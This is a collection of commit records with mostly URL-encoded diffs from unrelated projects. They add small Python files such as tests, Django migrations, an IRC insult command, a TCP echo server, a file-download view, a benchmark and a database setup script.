leetcode/14_longest_common_prefix.py
leetcode/14_longest_common_prefix.py
Python
0.044376
@@ -0,0 +1,468 @@ +%22%22%22%0AWrite a function to find the longest common prefix string amongst an array of strings.%0A%0AIf there is no common prefix, return an empty string %22%22.%0A%0AExample 1:%0AInput: %5B%22flower%22,%22flow%22,%22flight%22%5D%0AOutput: %22fl%22%0A%0AExample 2:%0AInput: %5B%22dog%22,%22racecar%22,%22car%22%5D%0AOutput: %22%22%0AExplanation: There is no common prefix among the input strings.%0ANote:%0A%0AAll given inputs are in lowercase letters a-z.%0A%22%22%22%0A%0Aclass Solution:%0A def longestCommonPrefix(self, strs: List%5Bstr%5D) -%3E str:%0A
347f22593a20c5553b9469fad051dbaa34643082
add test_log_likelihood.py
crosscat/tests/test_log_likelihood.py
crosscat/tests/test_log_likelihood.py
Python
0.000003
@@ -0,0 +1,2040 @@ +import argparse%0Afrom functools import partial%0A#%0Aimport pylab%0Apylab.ion()%0Apylab.show()%0A#%0Afrom crosscat.LocalEngine import LocalEngine%0Aimport crosscat.utils.data_utils as du%0Aimport crosscat.utils.timing_test_utils as ttu%0Aimport crosscat.utils.convergence_test_utils as ctu%0A%0A%0Aparser = argparse.ArgumentParser()%0Aparser.add_argument('--gen_seed', default=0, type=int)%0Aparser.add_argument('--num_rows', default=100, type=int)%0Aparser.add_argument('--num_cols', default=4, type=int)%0Aparser.add_argument('--num_clusters', default=5, type=int)%0Aparser.add_argument('--num_views', default=1, type=int)%0Aparser.add_argument('--n_steps', default=10, type=int)%0Aargs = parser.parse_args()%0A#%0Agen_seed = args.gen_seed%0Anum_rows = args.num_rows%0Anum_cols = args.num_cols%0Anum_clusters = args.num_clusters%0Anum_views = args.num_views%0An_steps = args.n_steps%0A#%0An_test = num_rows / 10%0A%0A%0A# generate data%0AT, M_c, M_r, gen_X_L, gen_X_D = ttu.generate_clean_state(gen_seed, num_clusters,%0A num_cols, num_rows, num_views)%0AT_test = ctu.create_test_set(M_c, T, gen_X_L, gen_X_D, n_test, seed_seed=0)%0Aengine = LocalEngine()%0AX_L, X_D = engine.initialize(M_c, M_r, T)%0Agen_mtll = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T_test)%0Agen_preplexity = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T)%0A%0A%0A# run inference%0Acalc_perplexity = lambda p_State: %5C%0A ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),%0A p_State.get_X_D(), T)%0Acalc_test_log_likelihood = lambda p_State: %5C%0A ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),%0A p_State.get_X_D(), T_test)%0Adiagnostic_func_dict = dict(%0A perplexity=calc_perplexity,%0A test_log_likelihood=calc_test_log_likelihood,%0A )%0AX_L, X_D, diagnostics_dict = engine.analyze(M_c, T, X_L, X_D,%0A do_diagnostics=diagnostic_func_dict, n_steps=n_steps)%0A%0A%0A# plot%0Apylab.plot(diagnostics_dict%5B'test_log_likelihood'%5D, 'g')%0Apylab.plot(diagnostics_dict%5B'perplexity'%5D, 'r')%0Apylab.axhline(gen_mtll, color='k')%0Apylab.axhline(gen_preplexity, color='b')%0A
3acbccb289ff74d063c4809d8fc20235e99ea314
When an assert fails, print the data that failed the assert so the problem can be triaged. BUG=none TEST=none Review URL: http://codereview.chromium.org/285005
webkit/build/rule_binding.py
webkit/build/rule_binding.py
#!/usr/bin/python # Copyright (c) 2009 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS # # INPUT is an IDL file, such as Whatever.idl. # # CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is # the directory into which V8Whatever.h will be placed. # # The first item in INPUTS is the path to generate-bindings.pl. Remaining # items in INPUTS are used to build the Perl module include path. # # OPTIONS are passed as-is to generate-bindings.pl as additional arguments. import errno import os import shlex import shutil import subprocess import sys def SplitArgsIntoSections(args): sections = [] while len(args) > 0: if not '--' in args: # If there is no '--' left, everything remaining is an entire section. dashes = len(args) else: dashes = args.index('--') sections.append(args[:dashes]) # Next time through the loop, look at everything after this '--'. if dashes + 1 == len(args): # If the '--' is at the end of the list, we won't come back through the # loop again. Add an empty section now corresponding to the nothingness # following the final '--'. args = [] sections.append(args) else: args = args[dashes + 1:] return sections def main(args): sections = SplitArgsIntoSections(args[1:]) assert len(sections) == 3 (base, inputs, options) = sections assert len(base) == 3 input = base[0] cppdir = base[1] hdir = base[2] assert len(inputs) > 1 generate_bindings = inputs[0] perl_modules = inputs[1:] include_dirs = [] for perl_module in perl_modules: include_dir = os.path.dirname(perl_module) if not include_dir in include_dirs: include_dirs.append(include_dir) # The defines come in as one flat string. Split it up into distinct arguments. if '--defines' in options: defines_index = options.index('--defines') if defines_index + 1 < len(options): split_options = shlex.split(options[defines_index + 1]) if split_options: options[defines_index + 1] = ' '.join(split_options) # Build up the command. command = ['perl', '-w'] for include_dir in include_dirs: command.extend(['-I', include_dir]) command.append(generate_bindings) command.extend(options) command.extend(['--outputDir', cppdir, input]) # Do it. check_call is new in 2.5, so simulate its behavior with call and # assert. return_code = subprocess.call(command) assert return_code == 0 # Both the .cpp and .h were generated in cppdir, but if hdir is different, # the .h needs to move. Copy it instead of using os.rename for maximum # portability in all cases. if cppdir != hdir: input_basename = os.path.basename(input) (root, ext) = os.path.splitext(input_basename) hname = 'V8%s.h' % root hsrc = os.path.join(cppdir, hname) hdst = os.path.join(hdir, hname) shutil.copyfile(hsrc, hdst) os.unlink(hsrc) return return_code if __name__ == '__main__': sys.exit(main(sys.argv))
Python
0.999999
@@ -1495,16 +1495,26 @@ ns) == 3 +, sections %0A (base @@ -1571,62 +1571,45 @@ == 3 +, base %0A +( input - = base%5B0%5D%0A cppdir = base%5B1%5D%0A +, cppdir, hdir +) = base -%5B2%5D %0A%0A @@ -1630,16 +1630,24 @@ uts) %3E 1 +, inputs %0A gener
c48d852c2ceb39e6692be1b2c270aa75156e5b5e
Add migrations/0121_….py
ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py
ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py
Python
0
@@ -0,0 +1,1283 @@ +# -*- coding: utf-8 -*-%0A# Inspired by:%0A# https://github.com/lingdb/CoBL/issues/223#issuecomment-256815113%0Afrom __future__ import unicode_literals, print_function%0Afrom django.db import migrations%0A%0A%0Adef forwards_func(apps, schema_editor):%0A Language = apps.get_model(%22lexicon%22, %22Language%22)%0A Meaning = apps.get_model(%22lexicon%22, %22Meaning%22)%0A Lexeme = apps.get_model(%22lexicon%22, %22Lexeme%22)%0A%0A hindi = Language.objects.get(ascii_name='Hindi')%0A urdu = Language.objects.get(ascii_name='Urdu')%0A%0A for meaning in Meaning.objects.all():%0A hLexemes = Lexeme.objects.filter(language=hindi, meaning=meaning).all()%0A uLexemes = Lexeme.objects.filter(language=urdu, meaning=meaning).all()%0A%0A if len(hLexemes) != 1 or len(uLexemes) != 1:%0A continue%0A%0A hLex = hLexemes%5B0%5D%0A uLex = uLexemes%5B0%5D%0A%0A if uLex.transliteration == '' and hLex.transliteration != '':%0A uLex.transliteration = hLex.transliteration%0A uLex.save()%0A%0A%0Adef reverse_func(apps, schema_editor):%0A print('Reverse of 0121_copy_hindi_transliteration_to_urdu does nothing.')%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B('lexicon', '306_0127_fix_issue_223')%5D%0A%0A operations = %5B%0A migrations.RunPython(forwards_func, reverse_func),%0A %5D%0A
da5bd8b1afcffd8a0509a785183ce1474fe7f53c
Create insult.py
insult.py
insult.py
Python
0.001151
@@ -0,0 +1,1972 @@ +%22%22%22By Bowserinator: Insults people :D%22%22%22%0A%0Afrom utils import add_cmd, add_handler%0Aimport utils%0Aimport random%0A%0Aname = %22insult%22%0Acmds = %5B%22insult%22%5D%0A%0AinsultPattern = %5B%0A    %22That %5BREPLACE%5D just cut me off!%22,%0A    %22My boss is a major %5BREPLACE%5D!%22,%0A    %22Don't tell her I said this, but that dude she's with is a real %5BREPLACE%5D!%22,%0A    %22Quit being such a %5BREPLACE%5D!%22,%0A    %22The only people who would vote for that guy are total %5BREPLACE%5Ds!%22,%0A    %22What are you, some kind of %5BREPLACE%5D?%22,%0A    %22Dude's a real %5BREPLACE%5D, you know what I mean?%22,%0A    %22He's got an ego like a %5BREPLACE%5D!%22,%0A    %22She was being a real %5BREPLACE%5D at the store today!%22,%0A    %22That %5BREPLACE%5D developer's code refuses to compile!%22,%0A    %22Her kids are total %5BREPLACE%5Ds!%22,%0A    %22Whoever wrote this API documentation is a complete %5BREPLACE%5D!%22,%0A    %22That guy has the personality of a %5BREPLACE%5D!%22,%0A    %22I'm pretty sure I was a total %5BREPLACE%5D at the bar last night.%22,%0A    %22What kind of %5BREPLACE%5D buys pre-ground coffee?%22,%0A    %22I'd rather get a %5BREPLACE%5D to the eye than sit through this lecture.%22,%0A    %22Wow, that %5BREPLACE%5D just went off the deep end.%22,%0A    %22I may be a jerk, but at least I'm not like that %5BREPLACE%5D over there.%22,%0A    %22I need that like I need a %5BREPLACE%5D on my elbow.%22,%0A    %22What kind of %5BREPLACE%5D slows down to merge on the highway?%22,%0A    %22You've got a face like a %5BREPLACE%5D.%22,%0A    %22Nothing personal, but you're a real %5BREPLACE%5D.%22,%0A    %22What a bunch of %5BREPLACE%5Ds.%22,%0A    %22That %5BREPLACE%5D is legally dead in 27 states - plus Guam.%22,%0A%5D%0A%0Abadwords = %5B%0A    'Ass',%0A    'Bitch',%0A    'Butt',%0A    'Cock',%0A    'Cum',%0A    'Cunt',%0A    'Dick',%0A    'Douche',%0A    'Fart',%0A    'Fuck',%0A    'Jizz',%0A    'Schlong',%0A    'Shit',%0A    'Slut',%0A    'Snatch',%0A    'Tit',%0A    'Twat',%0A    'Wang',%0A    'Wank',%0A    'Whore',%0A%5D%0A%0A@add_cmd%0Adef insult(irc, event, args):%0A    send = %22%5Cx02%22 + args%5B0%5D +%22, %5Cx0f%22 + random.choice(insultPattern).replace(%22%5BREPLACE%5D%22,random.choice(badwords).lower())%0A    irc.reply(event, send)%0A    %0Aadd_handler(insult, name)%0A
1a1bf760f9d912f6c19943b58198d947b4e65b84
Add mraa GPIO test
meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py
meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py
Python
0.000001
@@ -0,0 +1,1440 @@ +from oeqa.oetest import oeRuntimeTest%0Aimport unittest%0Aimport subprocess%0Afrom time import sleep%0A%0Aclass MraaGpioTest(oeRuntimeTest):%0A '''%0A These tests require to use BeagleBone as testing host%0A '''%0A pin = %22%22%0A def setUp(self):%0A (status, output)= self.target.run(%22mraa-gpio version%22)%0A output = output.lower()%0A if any(x in output for x in (%22broxton%22, %22tuchuck%22, %22joule%22)):%0A self.pin = %2251%22%0A elif %22minnowboard%22 in output:%0A self.pin = %2225%22%0A else:%0A raise unittest.SkipTest(output)%0A%0A def test_gpio(self):%0A '''%0A Test a GPIO pin on and off and check the pin output with%0A BeagleBone%0A '''%0A def check_gpio_output():%0A cmd = %22cat /sys/class/gpio/gpio20/value%22.split()%0A output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)%0A return int(output)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 0%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 0, msg=%22GPIO pin output is not 0%22)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 1%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 1, msg=%22GPIO pin output is not 1%22)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 0%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 0, msg=%22GPIO pin output is not 0%22)%0A
8b7e84e98ccf0b44d7c6cc6ff23f462ec648d3f0
add test
msmbuilder/tests/test_feature_selection.py
msmbuilder/tests/test_feature_selection.py
import numpy as np from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR from ..featurizer import DihedralFeaturizer from ..feature_selection import FeatureSelector, VarianceThreshold from ..example_datasets import fetch_alanine_dipeptide as fetch_data FEATS = [ ('phi', DihedralFeaturizer(types=['phi'], sincos=True)), ('psi', DihedralFeaturizer(types=['psi'], sincos=True)), ] def test_featureselector(): dataset = fetch_data() trajectories = dataset["trajectories"] fs = FeatureSelector(FEATS, which_feat='phi') assert fs.which_feat == ['phi'] y1 = fs.partial_transform(trajectories[0]) y_ref1 = FEATS[0][1].partial_transform(trajectories[0]) np.testing.assert_array_almost_equal(y_ref1, y1) def test_variancethreshold_vs_sklearn(): dataset = fetch_data() trajectories = dataset["trajectories"] fs = FeatureSelector(FEATS) vt = VarianceThreshold(0.1) vtr = VarianceThresholdR(0.1) y = fs.partial_transform(trajectories[0]) z1 = vt.fit_transform([y])[0] z_ref1 = vtr.fit_transform(y) np.testing.assert_array_almost_equal(z_ref1, z1)
Python
0.000002
@@ -771,16 +771,255 @@ , y1)%0A%0A%0A +def test_featureselector_transform():%0A dataset = fetch_data()%0A trajectories = dataset%5B%22trajectories%22%5D%0A%0A fs = FeatureSelector(FEATS, which_feat='psi')%0A%0A y1 = fs.transform(trajectories)%0A%0A assert len(y1) == len(trajectories)%0A%0A%0A def test
e2b74a9978de4a6f15273e3e098379107eb0bec3
Create 0001_0.py
pylyria/0001/0001_0.py
pylyria/0001/0001_0.py
Python
0.019732
@@ -0,0 +1,632 @@ +# -*- coding: utf-8 -*-%0A#!/usr/bin/env python%0A#%E7%AC%AC 0001 %E9%A2%98%EF%BC%9A%E5%81%9A%E4%B8%BA Apple Store App %E7%8B%AC%E7%AB%8B%E5%BC%80%E5%8F%91%E8%80%85%EF%BC%8C%E4%BD%A0%E8%A6%81%E6%90%9E%E9%99%90%E6%97%B6%E4%BF%83%E9%94%80%EF%BC%8C%E4%B8%BA%E4%BD%A0%E7%9A%84%E5%BA%94%E7%94%A8%E7%94%9F%E6%88%90%E6%BF%80%E6%B4%BB%E7%A0%81%EF%BC%88%E6%88%96%E8%80%85%E4%BC%98%E6%83%A0%E5%88%B8%EF%BC%89%EF%BC%8C%E4%BD%BF%E7%94%A8 Python %E5%A6%82%E4%BD%95%E7%94%9F%E6%88%90 200 %E4%B8%AA%E6%BF%80%E6%B4%BB%E7%A0%81%EF%BC%88%E6%88%96%E8%80%85%E4%BC%98%E6%83%A0%E5%88%B8%EF%BC%89%EF%BC%9F%0Aimport random%0Aimport string%0A%0Adef activation_code(id,length=16):%0A    prefix = hex(int(id))%5B2:%5D+'V'%0A    length = length - len(prefix)%0A    chars=string.ascii_uppercase+string.digits%0A    return prefix + ''.join(%5Brandom.choice(chars) for i in range(length)%5D)%0A%0Adef get_id(code):%0A    return str(int(code.upper(), 16))%0A%0Aif __name__ == '__main__':%0A    for i in range(10, 500, 23):%0A        code = activation_code(i)%0A        id_hex = code.split('V')%5B0%5D%0A        id = get_id(id_hex)%0A        print code,id%0A
45db21e2b4093cbda7976189327467ca3aebe1a3
add instance serializer
api/v2/serializers/instance_serializer.py
api/v2/serializers/instance_serializer.py
Python
0.000001
@@ -0,0 +1,508 @@ +from core.models import Instance%0Afrom rest_framework import serializers%0Afrom .identity_summary_serializer import IdentitySummarySerializer%0Afrom .user_serializer import UserSerializer%0A%0A%0Aclass InstanceSerializer(serializers.ModelSerializer):%0A identity = IdentitySummarySerializer(source='created_by_identity')%0A user = UserSerializer(source='created_by')%0A%0A class Meta:%0A model = Instance%0A fields = ('id', 'name', 'ip_address', 'shell', 'vnc', 'start_date', 'end_date', 'identity', 'user')%0A
3fc5c2a4d3f13dc8062c93dd86fd94f06c35c91d
add a simple echo server in Python
network/echo-server/echo-iterative/main.py
network/echo-server/echo-iterative/main.py
Python
0.000002
@@ -0,0 +1,2089 @@ +#!/usr/bin/env python%0A# -*- coding: UTF-8 -*-%0A#%0A# Copyright (c) 2016 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0Aimport socket%0A%0Adef handle(client_socket, client_address):%0A while True:%0A data = client_socket.recv(4096)%0A if data:%0A sent = client_socket.send(data)%0A else:%0A print 'disconnect', client_address%0A client_socket.close()%0A break%0A%0Adef main():%0A listen_address = ('0.0.0.0', 5555)%0A server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A server_socket.bind(listen_address)%0A server_socket.listen(5)%0A%0A while True:%0A (client_socket, client_address) = server_socket.accept()%0A print 'got connection from', client_address%0A handle(client_socket, client_address)%0A%0Aif __name__ == '__main__':%0A main()%0A
07fd61306e645b7240883d5d468f94be5ce8a34c
Add a command to retrieve all triggers
Commands/Triggers.py
Commands/Triggers.py
Python
0.000002
@@ -0,0 +1,881 @@ +from IRCResponse import IRCResponse, ResponseType%0Afrom CommandInterface import CommandInterface%0Aimport GlobalVars%0A%0Aclass Command(CommandInterface):%0A triggers = %5B%22triggers%22%5D%0A help = %22triggers -- returns a list of all command triggers, must be over PM%22%0A%0A def execute(self, Hubbot, message):%0A if message.User.Name != message.ReplyTo:%0A return IRCResponse(ResponseType.Say, %22%7B%7D must be used over PM!%22.format(message.Command), message.ReplyTo)%0A else:%0A response = %22%22%0A for name, command in GlobalVars.commands.iteritems():%0A if len(command.triggers)%3E0:%0A for trigger in command.triggers:%0A if %22%3C%22 not in trigger and trigger not in response:%0A response += %22%7B%7D, %22.format(trigger)%0A return IRCResponse(ResponseType.Say, response, message.ReplyTo)
b173aa1a6dc1c361d65150c6782db7618a5ff126
Add simple indexing test.
benchmarks/simpleindex.py
benchmarks/simpleindex.py
Python
0
@@ -0,0 +1,1393 @@ +import timeit%0A# This is to show that NumPy is a poorer choice than nested Python lists%0A# if you are writing nested for loops.%0A# This is slower than Numeric was but Numeric was slower than Python lists were%0A# in the first place. %0A%0AN = 30%0Acode2 = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk,l%5D.item() + a%5Bl,k%5D.item()%0A%22%22%22 %25 (N,N)%0Acode3 = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk%5D%5Bl%5D + a%5Bl%5D%5Bk%5D%0A%22%22%22 %25 (N,N)%0Acode = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk,l%5D + a%5Bl,k%5D%0A%22%22%22 %25 (N,N)%0Asetup3 = r%22%22%22%0Aimport random%0Aa = %5B%5BNone for k in xrange(%25d)%5D for l in xrange(%25d)%5D%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A a%5Bk%5D%5Bl%5D = random.random()%0A%22%22%22 %25 (N,N,N,N)%0At1 = timeit.Timer(code, 'import numpy as N; a = N.rand(%25d,%25d)' %25 (N,N))%0At2 = timeit.Timer(code, 'import MLab as N; a=N.rand(%25d,%25d)' %25 (N,N))%0At3 = timeit.Timer(code, 'import numarray.mlab as N; a=N.rand(%25d,%25d)' %25 (N,N))%0At4 = timeit.Timer(code2, 'import numpy as N; a = N.rand(%25d,%25d)' %25 (N,N))%0At5 = timeit.Timer(code3, setup3)%0At6 = timeit.Timer(%22res = a + a.transpose()%22,%22import numpy as N; a=N.rand(%25d,%25d)%22 %25 (N,N))%0Aprint %22shape = %22, (N,N)%0Aprint %22NumPy 1: %22, t1.repeat(3,100)%0Aprint %22NumPy 2: %22, t4.repeat(3,100)%0Aprint %22Numeric: %22, t2.repeat(3,100)%0Aprint %22Numarray: %22, t3.repeat(3,100)%0Aprint %22Python: %22, t5.repeat(3,100)%0Aprint %22Optimized: %22, t6.repeat(3,100)%0A
99061bec96a7337e6ddc1d698f00805f84089b3b
Set content headers on download
bepasty/views/download.py
bepasty/views/download.py
# Copyright: 2013 Bastian Blank <[email protected]> # License: BSD 2-clause, see LICENSE for details. from flask import Response, current_app, stream_with_context from flask.views import MethodView from ..utils.name import ItemName from . import blueprint class DownloadView(MethodView): def get(self, name): n = ItemName.parse(name) item = current_app.storage.open(n) def stream(): try: # Stream content from storage offset = 0 size = item.data.size while offset < size: buf = item.data.read(16*1024, offset) offset += len(buf) yield buf finally: item.close() return Response(stream_with_context(stream())) blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
Python
0
@@ -771,11 +771,10 @@ ret -urn + = Res @@ -810,16 +810,196 @@ eam()))%0A + ret.headers%5B'Content-Disposition'%5D = 'attachment; filename=%22%7B%7D%22'.format(item.meta%5B'filename'%5D)%0A ret.headers%5B'Content-Length'%5D = item.meta%5B'size'%5D%0A return ret%0A %0A%0Abluepr
5787d3ff813d2c96d0ec2c2fd90f91b93315e564
Add stub for cliches
proselint/checks/inprogress/wgd_cliches.py
proselint/checks/inprogress/wgd_cliches.py
Python
0.000001
@@ -0,0 +1,351 @@ +%22%22%22WGD101: Cliches.%0A%0A---%0Alayout: post%0Aerror_code: WGD101%0Asource: write-good%0Asource_url: https://github.com/btford/write-good%0Atitle: WGD101&#58; Cliches%0Adate: 2014-06-10 12:31:19%0Acategories: writing%0A---%0A%0ACliches are cliche.%0A%0A%22%22%22%0A%0A%0Adef check(text):%0A%0A error_code = %22WGD101%22%0A msg = %22Cliche.%22%0A%0A return %5B(1, 1, error_code, msg)%5D%0A
9068fd506811113c50886bf9c8f4094b7e1bd7a3
Add stats.py from week 2.
hw3/stats.py
hw3/stats.py
Python
0
@@ -0,0 +1,1956 @@ +#!/usr/bin/python%0A%0A# Week 2 Problem 3. Simple statistics.%0A%0A# Use Python 3 print() function, Python 3 integer division%0Afrom __future__ import print_function, division%0A%0A%0Adef get_stats(input_list):%0A '''%0A Accepts a list of integers, and returns a tuple of four numbers:%0A minimum(int), maximum(int), mean(float), and median(float)%0A%0A %3E%3E%3E get_stats(%5B0, 1, 2, 3, 4%5D)%0A (0, 4, 2.0, 2.0)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 3, 4, 5%5D)%0A (0, 5, 2.5, 2.5)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 5%5D)%0A (0, 5, 2.0, 1.5)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 4, 5%5D)%0A (0, 5, 2.4, 2.0)%0A ''' %0A%0A # min() and max() are in the standard library%0A # you could also write%0A # minimum = sorted(input_list)%5B0%5D%0A # maximum = sorted(input_list)%5B-1%5D%0A minimum = min(input_list)%0A maximum = max(input_list)%0A%0A # use the sum() function from the standard library to calculate mean%0A # this is equivalent to%0A # total = length = 0%0A # for i in input_list: total += i%0A # for i in input_list: length += 1%0A # mean = total / length%0A mean = sum(input_list) / len(input_list)%0A%0A # calculate the median%0A # if the number of elements is even, we take the average of 2 middle numbers%0A # if the number of elements is odd, median is the middle element%0A # note that we used the Python 3 integer division // to get integer%0A if len(input_list) %25 2:%0A median = input_list%5B(len(input_list) - 1) // 2 %5D%0A else:%0A median = 0.5 * (input_list%5B(len(input_list) - 1) // 2%5D %5C%0A + input_list%5Blen(input_list) // 2%5D)%0A%0A # return a tuple of min, max, mean, median%0A return minimum, maximum, mean, median%0A %0Aif __name__ == '__main__':%0A%0A # we will test our function with a list of integers from 0 to 50%0A my_list = range(0, 51)%0A%0A # get_stats returns a tuple of min, max, mean, median of my_list%0A # print out min, max, mean, median on each line%0A print(%22Minimum: %25i%5CnMaximum: %25i%5CnMean: %25.1f%5CnMedian: %25.1f%22 %25 get_stats(my_list))
84f31dfa718a2f557b0058920037265331fd1a3f
Add missing merge migration
osf/migrations/0099_merge_20180427_1109.py
osf/migrations/0099_merge_20180427_1109.py
Python
0.000002
@@ -0,0 +1,332 @@ +# -*- coding: utf-8 -*-%0A# Generated by Django 1.11.11 on 2018-04-27 16:09%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('osf', '0098_merge_20180416_1807'),%0A ('osf', '0098_auto_20180418_1722'),%0A %5D%0A%0A operations = %5B%0A %5D%0A
d6850ebe441a966dcf17f5cb8b0ce57a7c9dce8a
Add argument parsing
helenae/db/create_db.py
helenae/db/create_db.py
Python
0.000035
@@ -0,0 +1,2276 @@ +from optparse import OptionParser%0A%0Aimport sqlalchemy.exc%0Afrom sqlalchemy import text%0Afrom sqlalchemy.orm import sessionmaker%0A%0Afrom tables import *%0A%0A%0Adef create_db():%0A    %22%22%22%0A    Defined tables at tables.py file are created in some DB%0A    %22%22%22%0A    try:%0A        Base.metadata.create_all(engine)%0A    except sqlalchemy.exc.InvalidRequestError:%0A        print %22SQLAlchemy ERROR: SQLAlchemy was asked to do something it can't do%22%0A    except sqlalchemy.exc.DBAPIError, exc:%0A        print %22SQLAlchemy ERROR: %25s%22 %25 exc%0A    except sqlalchemy.exc.SQLAlchemyError, exc:%0A        print %22SQLAlchemy ERROR: %25s%22 %25 exc%0A%0Adef initialize_db():%0A    %22%22%22%0A    This code inserting testing data into defined tables%0A    %22%22%22%0A    #insert test data%0A    Session = sessionmaker(bind=engine)%0A    session = Session()%0A%0A    test_dir = Catalog('test')%0A    session.add(test_dir)%0A    session.commit()%0A%0A    #test_file = File('test.txt', '123456.txt', hash('123456.txt'), 1024, 0, 1)%0A    #test_file.server_id.append(test_server)%0A    #session.add(test_file)%0A    #session.commit()%0A%0A    test_fs = FileSpace('test')%0A    session.add(test_fs)%0A    session.commit()%0A%0A    test_acctype = AccountType('free', 0.00)%0A    session.add(test_acctype)%0A    session.commit()%0A%0A    test_group = Group('users', 1101)%0A    session.add(test_group)%0A    session.commit()%0A%0A    test_user = Users('relrin', 'Valery Savich', hash('123456'), '[email protected]', '01.01.2014', 1, 1, 1)%0A    session.add(test_user)%0A    session.commit()%0A%0A    session.close()%0A    print %22Insertion data is complete!%22%0A%0A    print %22Test query: Getting data from %5BUsers%5D table%5Cn%22%0A    connection = engine.connect()%0A    result = engine.execute(text(%22select name, fullname, password from users%22))%0A    for row in result:%0A        print %22Users%3Cname=%25s, fullname=%25s, password=%25s%3E%22 %25 (row.name, row.fullname, row.password)%0A%0A%0A%0Aif __name__ == '__main__':%0A    parser = OptionParser()%0A    parser.add_option(%22-c%22, %22--crtdb%22, dest='cdb', help = %22Create database%22, default=False)%0A    parser.add_option(%22-i%22, %22--initdb%22, dest = %22idb%22, help = %22Initialize DB: insert test data%22, default=False)%0A    (options, args) = parser.parse_args()%0A%0A    options.cdb = bool(options.cdb)%0A    options.idb = bool(options.idb)%0A    if options.cdb:%0A        create_db()%0A    if options.idb:%0A        initialize_db()%0A
712733ead5e36362fe6e2eca1235744c257c7f69
Create helloWorld.py
helloWorld.py
helloWorld.py
Python
0.999992
@@ -0,0 +1,43 @@ +# program in python%0A%0Aprint(%22Hello World!%22)%0A
bf56a5afed926d7cdd536c1da8ba5b021a09bd95
Test pipe framework
skan/test/test_pipe.py
skan/test/test_pipe.py
Python
0
@@ -0,0 +1,474 @@ +import os%0Aimport pytest%0A%0Aimport pandas%0Afrom skan import pipe%0A%[email protected]%0Adef image_filename():%0A rundir = os.path.abspath(os.path.dirname(__file__))%0A datadir = os.path.join(rundir, 'data')%0A return os.path.join(datadir, 'retic.tif')%0A%0A%0Adef test_pipe(image_filename):%0A data = pipe.process_images(%5Bimage_filename%5D, 'fei', 5e-8, 0.1, 0.075,%0A 'Scan/PixelHeight')%0A assert type(data) == pandas.DataFrame%0A assert data.shape%5B0%5D %3E 0%0A
b663bf77fe60a108598db4ae8310e8877d06cddd
Add unit tests for core module
tests/core_test.py
tests/core_test.py
Python
0
